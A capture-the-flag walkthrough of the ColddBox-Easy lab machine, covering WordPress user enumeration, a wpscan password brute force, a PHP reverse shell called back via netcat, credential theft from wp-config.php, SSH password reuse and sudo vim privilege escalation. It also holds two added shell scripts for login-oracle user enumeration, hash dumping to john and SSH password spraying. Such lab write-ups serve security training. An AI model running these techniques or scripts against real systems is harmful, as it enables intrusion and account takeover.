Port scanning with nmap, or you can use recon, a wrapper that chains nmap, whatweb and dirb:

┌──(root@ghost)-[/home/ghost]
└─# recon c0ldd.vuln

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-01 11:50 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Initiating ARP Ping Scan at 11:50
Scanning c0ldd.vuln (10.0.2.28) [1 port]
Completed ARP Ping Scan at 11:50, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:50
Scanning c0ldd.vuln (10.0.2.28) [65535 ports]
Discovered open port 80/tcp on 10.0.2.28
Discovered open port 4512/tcp on 10.0.2.28
Completed SYN Stealth Scan at 11:50, 1.48s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.28.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Nmap scan report for c0ldd.vuln (10.0.2.28)
Host is up (0.000054s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
4512/tcp open  unknown
MAC Address: 08:00:27:70:43:DD (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.79 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[i] [Server info]
http://c0ldd.vuln:80 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.0.2.28], JQuery[1.11.1], MetaGenerator[WordPress 4.1.31], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[ColddBox | One more machine], WordPress[4.1.31], x-pingback[/xmlrpc.php]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Oct  1 11:50:28 2022
URL_BASE: http://c0ldd.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://c0ldd.vuln:80/ ----
==> DIRECTORY: http://c0ldd.vuln:80/hidden/                                                                                                                                                        
+ http://c0ldd.vuln:80/index.php (CODE:301|SIZE:0)                                                                                                                                                 
+ http://c0ldd.vuln:80/server-status (CODE:403|SIZE:275)                                                                                                                                           
==> DIRECTORY: http://c0ldd.vuln:80/wp-admin/                                                                                                                                                      
==> DIRECTORY: http://c0ldd.vuln:80/wp-content/                                                                                                                                                    
==> DIRECTORY: http://c0ldd.vuln:80/wp-includes/                                                                                                                                                   
+ http://c0ldd.vuln:80/xmlrpc.php (CODE:200|SIZE:42)                                                                                                                                               
                                                                                                                                                                                                   
-----------------
END_TIME: Sat Oct  1 11:50:29 2022
DOWNLOADED: 4612 - FOUND: 3

recon reports two open ports: 80 (http) and 4512 (unknown service). The web server hosts a WordPress site, as the whatweb output shows (WordPress 4.1.31 on Apache 2.4.18 / Ubuntu). Let's identify the service on 4512 with a version scan:

┌──(root@ghost)-[/home/ghost]
└─# nmap c0ldd.vuln -v -sV -p 4512 --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-01 11:54 EDT
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 11:54
Scanning c0ldd.vuln (10.0.2.28) [1 port]
Completed ARP Ping Scan at 11:54, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:54
Scanning c0ldd.vuln (10.0.2.28) [1 port]
Discovered open port 4512/tcp on 10.0.2.28
Completed SYN Stealth Scan at 11:54, 0.02s elapsed (1 total ports)
Initiating Service scan at 11:54
Scanning 1 service on c0ldd.vuln (10.0.2.28)
Completed Service scan at 11:54, 0.01s elapsed (1 service on 1 host)
NSE: Script scanning 10.0.2.28.
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Nmap scan report for c0ldd.vuln (10.0.2.28)
Host is up (0.00040s latency).

PORT     STATE SERVICE VERSION
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:70:43:DD (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

OK, so port 4512 looks like SSH (OpenSSH 7.2p2) at first glance. Next, enumerate WordPress users and plugins with wpscan:

┌──(root@ghost)-[/home/ghost]
└─# wpscan -e u,p --url http://c0ldd.vuln/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://c0ldd.vuln/ [10.0.2.28]
[+] Started: Sat Oct  1 11:56:54 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://c0ldd.vuln/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://c0ldd.vuln/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://c0ldd.vuln/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://c0ldd.vuln/?feed=rss2, https://wordpress.org/?v=4.1.31
 |  - http://c0ldd.vuln/?feed=comments-rss2, https://wordpress.org/?v=4.1.31

[+] WordPress theme in use: twentyfifteen
 | Location: http://c0ldd.vuln/wp-content/themes/twentyfifteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://c0ldd.vuln/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://c0ldd.vuln/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://c0ldd.vuln/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Oct  1 11:56:58 2022
[+] Requests Done: 75
[+] Cached Requests: 6
[+] Data Sent: 16.948 KB
[+] Data Received: 19.156 MB
[+] Memory used: 231.461 MB
[+] Elapsed time: 00:00:04

We obtain three WordPress usernames: hugo, c0ldd and philip (plus the display name "the cold in person" from the RSS feed). Time to brute-force c0ldd's password with rockyou:
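wpscan found those users in two steps: brute forcing /?author=N (WordPress 301-redirects each valid ID to /author/<slug>/) and confirming every slug against wp-login.php, whose 4.x error messages differ for an unknown username and for a wrong password. The script below reproduces both steps by hand. It is an added example, not part of the original writeup or of wpscan; it assumes pretty permalinks are enabled, the stock WordPress 4.x login error strings, and that the author slug equals the login name (WordPress builds the slug from user_nicename, which can differ).

```shell
#!/bin/sh
# Added example: manual WordPress user enumeration, the same two techniques
# WPScan reported above (Author Id Brute Forcing + Login Error Messages).
# Assumes pretty permalinks (so /?author=N 301-redirects to /author/<slug>/)
# and the stock WordPress 4.x wp-login.php error strings.

# extract_author_slug "Location: http://host/author/hugo/" -> "hugo"
# Prints nothing when the header does not point at an author archive.
extract_author_slug() {
    printf '%s\n' "$1" |
        sed -n 's#^[Ll]ocation:.*/author/\([^/[:space:]]*\)/\{0,1\}.*$#\1#p'
}

# classify_login_error BODY -> valid | invalid | unknown
# WordPress 4.x leaks whether the username exists: an unknown user gets
# "Invalid username", an existing one "The password you entered for the
# username ... is incorrect". Anything else (lockout plugin, generic
# message) is reported as unknown rather than guessed.
classify_login_error() {
    case "$1" in
        *"The password you entered for the username"*) echo valid ;;
        *"Invalid username"*)                          echo invalid ;;
        *)                                             echo unknown ;;
    esac
}

# enumerate_users BASE_URL [MAX_ID]: walk author IDs, then confirm each slug
# through the login oracle with a deliberately wrong password.
enumerate_users() {
    local base max i hdr slug body
    base="$1"; max="${2:-10}"
    for i in $(seq 1 "$max"); do
        # -D - dumps the response headers to stdout; we only want Location.
        hdr=$(curl -s -o /dev/null -D - "$base/?author=$i" | grep -i '^Location:')
        slug=$(extract_author_slug "$hdr")
        [ -n "$slug" ] || continue
        body=$(curl -s --data-urlencode "log=$slug" \
                       --data-urlencode "pwd=definitely-wrong-$$" \
                       --data-urlencode "wp-submit=Log In" \
                       "$base/wp-login.php")
        printf '%s\t%s\n' "$slug" "$(classify_login_error "$body")"
    done
}

# Usage against the lab box: enumerate_users http://c0ldd.vuln 10
```

Each line of output is a slug followed by valid, invalid or unknown; a slug that comes back invalid usually means the nicename differs from the login name, so the login oracle has to be rerun with candidate login names instead.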

┌──(root@ghost)-[/home/ghost]
└─# wpscan -U c0ldd -P rockyou.txt --url http://c0ldd.vuln/
[+] URL: http://c0ldd.vuln/ [10.0.2.28]
[+] Started: Sat Oct  1 11:58:58 2022

[... Interesting Finding(s) identical to the previous run, omitted ...]

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=====================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0ldd / 9876543210                                                                                                                                                                      
Trying c0ldd / 9876543210 Time: 00:00:10 <                                                                                                                 > (1225 / 14345617)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: c0ldd, Password: 9876543210

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Oct  1 11:59:14 2022
[+] Requests Done: 1366
[+] Cached Requests: 36
[+] Data Sent: 436.496 KB
[+] Data Received: 4.514 MB
[+] Memory used: 252.156 MB
[+] Elapsed time: 00:00:15

We have c0ldd's WordPress password; time to log in. I decided to upload a PHP reverse shell as a new theme, generated with shellstorm.sh (php-daemon payload, calling back to 10.0.2.15:1337):

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.php

Once netcat is listening, curl the path where the shell ended up, http://c0ldd.vuln/wp-content/uploads/2022/10/rev.php (the wp-content/uploads/YYYY/MM/ layout is WordPress' media-library path):

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from c0ldd.vuln [10.0.2.28] 46772
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 18:11:33 up 31 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")';
www-data@ColddBox-Easy:/$ export TERM=xterm;export SHELL=bash
www-data@ColddBox-Easy:/$ ss -tnl

State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
LISTEN     0      128          *:4512                     *:*                  
LISTEN     0      128    127.0.0.1:3306                     *:*                  
LISTEN     0      128         :::4512                    :::*                  
LISTEN     0      128         :::80                      :::*                  
www-data@ColddBox-Easy:/$ service mysql status

* mysql.service - LSB: Start and stop the mysql database server daemon
   Loaded: loaded (/etc/init.d/mysql; bad; vendor preset: enabled)
   Active: active (running) since Sat 2022-10-01 17:39:46 CEST; 38min ago
     Docs: man:systemd-sysv-generator(8)
  Process: 1094 ExecStart=/etc/init.d/mysql start (code=exited, status=0/SUCCESS
    Tasks: 30
   Memory: 88.7M
      CPU: 2.029s
   CGroup: /system.slice/mysql.service
           |-1245 /bin/bash /usr/bin/mysqld_safe
           |-1398 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plu
           `-1399 logger -t mysqld -p daemon error

So there is a MySQL service bound to localhost only (127.0.0.1:3306). It is unreachable from outside, but the WordPress configuration must hold credentials for it:

www-data@ColddBox-Easy:/$ cd /var/www/html
www-data@ColddBox-Easy:/var/www/html$ cat wp-config.php

<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');

/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');
...

So we have the MySQL credentials (c0ldd / cybersecurity). At this point you could log in to the database and try to crack philip's password hash from wp_users, but that is probably a rabbit hole. Password reuse is the cheaper bet: try the DB password against SSH on port 4512 with the same username:
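Parsing the defines out of wp-config.php and reusing them, first against MySQL to pull the phpass hashes mentioned above, then as the SSH password-reuse check that follows, as an added example that is not part of the original writeup. It assumes the mysql client, john (jumbo build, phpass format) and sshpass are available, the default wp_ table prefix when none is found, and define() values without embedded quote characters; the sample config is constructed from the defines shown above.

```shell
#!/bin/sh
# Added example: harvest DB settings from wp-config.php and reuse them the
# way the writeup does. Assumes mysql client, john (jumbo, phpass format) and
# sshpass are installed where this runs. Not part of the original post.

# Constructed sample mirroring the defines shown above (not the real file).
SAMPLE_WP_CONFIG=$(cat <<'EOF'
<?php
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define( "DB_PASSWORD", "cybersecurity" );
define('DB_HOST', 'localhost');
$table_prefix  = 'wp_';
EOF
)

# wp_define CONFIG KEY -> value of define('KEY', 'value');
# Accepts single or double quotes and optional whitespace inside the
# parentheses; a value containing a quote character is not handled.
wp_define() {
    printf '%s\n' "$1" | sed -n \
        "s/^[[:space:]]*define([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"][[:space:]]*);.*/\1/p" |
        head -n 1
}

# wp_table_prefix CONFIG -> value of $table_prefix (empty if absent)
wp_table_prefix() {
    printf '%s\n' "$1" | sed -n \
        "s/^[[:space:]]*\\\$table_prefix[[:space:]]*=[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" |
        head -n 1
}

# dump_wp_hashes CONFIG: log in to MySQL with the recovered credentials, pull
# login:phpass-hash pairs for every WordPress user and hand them to john.
# Needs the mysql client and john on the box where it runs (network side).
dump_wp_hashes() {
    local cfg prefix
    cfg="$1"
    prefix=$(wp_table_prefix "$cfg"); prefix=${prefix:-wp_}
    mysql -h "$(wp_define "$cfg" DB_HOST)" -u "$(wp_define "$cfg" DB_USER)" \
          -p"$(wp_define "$cfg" DB_PASSWORD)" -N -B "$(wp_define "$cfg" DB_NAME)" \
          -e "SELECT CONCAT(user_login, ':', user_pass) FROM ${prefix}users;" \
          > wp_hashes.txt
    john --format=phpass --wordlist=rockyou.txt wp_hashes.txt
}

# check_ssh_reuse HOST PORT PASSWORD USER...: try one password against several
# accounts over SSH; a zero exit from `true` on the remote side means login.
check_ssh_reuse() {
    local host port pass u
    host="$1"; port="$2"; pass="$3"; shift 3
    for u in "$@"; do
        if sshpass -p "$pass" ssh -p "$port" -o ConnectTimeout=5 \
                -o StrictHostKeyChecking=no -o PubkeyAuthentication=no \
                -o PreferredAuthentications=password \
                "$u@$host" true 2>/dev/null; then
            echo "REUSE $u:$pass on $host:$port"
        fi
    done
}

# Usage (against the lab box):
#   dump_wp_hashes "$(cat /var/www/html/wp-config.php)"   # from the www-data shell
#   check_ssh_reuse c0ldd.vuln 4512 "$(wp_define "$SAMPLE_WP_CONFIG" DB_PASSWORD)" c0ldd hugo philip
```

Checking all three WordPress names and not just c0ldd costs nothing and catches the case where a different account reuses the database password; the user list from wpscan and the Linux account list are not the same thing, so a miss for hugo or philip only says they have no such system account or use a different password.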

┌──(root@ghost)-[/home/ghost]
└─# ssh c0ldd@c0ldd.vuln -p 4512
The authenticity of host '[c0ldd.vuln]:4512 ([10.0.2.28]:4512)' can't be established.
ED25519 key fingerprint is SHA256:4Burx9DOSmBG9A0+DFqpM7rY4cyqpq59iluJwKx690c.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[c0ldd.vuln]:4512' (ED25519) to the list of known hosts.
c0ldd@c0ldd.vuln's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


128 packages can be updated.
92 updates are security updates.

Last login: Mon Oct 19 18:48:20 2020 from 10.0.1.4
c0ldd@ColddBox-Easy:~$ cat user.txt | base64 -d
Felicidades, primer nivel conseguido!

We have the user flag (the decoded text reads "Congratulations, first level achieved!"). Time to go for root; start with what sudo allows:

c0ldd@ColddBox-Easy:~$ sudo -l
[sudo] password for c0ldd: 
Matching Defaults entries for c0ldd on ColddBox-Easy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User c0ldd may run the following commands on ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp

Any of the three gives root: vim can run a command from inside the editor with :!, chmod could set the setuid bit on a shell binary, and ftp has a ! escape to a shell. Using vim:

c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'

# cat /root/root.txt | base64 -d
¡Felicidades, máquina completada!

Root flag obtained; the decoded text reads "Congratulations, machine completed!".